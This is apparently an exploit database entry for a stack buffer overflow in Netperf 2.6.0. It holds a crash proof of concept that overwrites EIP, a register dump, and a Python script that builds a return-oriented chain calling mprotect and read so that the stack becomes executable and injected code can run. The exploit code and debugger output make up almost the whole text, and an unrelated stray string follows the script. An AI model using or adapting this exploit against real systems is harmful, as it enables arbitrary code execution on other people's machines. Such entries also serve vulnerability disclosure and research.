# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com # # Tested on: Kali i686 GNU/Linux # # Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking. # It provides tests for both unidirectional troughput and end-to-end latency. # # Vendor: https://hewlettpackard.github.io/netperf/ # # Program received signal SIGSEGV, Segmentation fault. # 0x41424344 in ?? () # LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA #EAX0x6d #EBX0x41414141 ('AAAA') #ECX0x6f #EDX0x430320 (test_name) 'TCP_STREAM' #EDI0xb7ea2000 (_GLOBAL_OFFSET_TABLE_) #ESI0xbfffd2c0 0x3 #EBP0x41414141 ('AAAA') #ESP0xbfffd280 0x0 #EIP0x41424344 ('DCBA') # Invalid address 0x41424344 # Program received signal SIGSEGV (fault address 0x41424344) # PoC: run -a `python -c 'print "A"*8220+"DCBA"'` from struct import pack # int mprotect(void *addr, size_t len, int prot); # define PROT_READ 0x1 # define PROT_WRITE0x2 # define PROT_EXEC 0x4 # # gefp mprotect # $1 = {<text variable, no debug info>} 0xb7dbdfd0 <mprotect> # gefp read #{ssize_t (int, void *, size_t)} 0xb7db06b0 <__GI___libc_read> # # gefropgadget #pop3ret = 0x402fea offset = 8220 mprotect = 0xb7dbdfd0 # <mprotect> read = 0xb7db06b0 # <read> pop3ret = 0x402fea target_memory = 0xb7fd4000 # r-xp [vdso] rop_chain = 'A' * offset rop_chain += pack('I', mprotect) # mprotect rop_chain += pack('I', pop3ret) #gadget rop_chain += pack('I', 0xbffdf000) # arg - void* rop_chain += pack('I', 0x100000) # arg size_t rop_chain += pack('I',0x7) # arg int rop_chain += pack('I', read) rop_chain += pack('I', 0xbffdf000) # return stack rop_chain += pack('I',0x00) # arg int fd rop_chain += pack('I',0xbffdf000) # arg void rop_chain += pack('I',0x200) # arg size_t print rop_chain
体验盒子
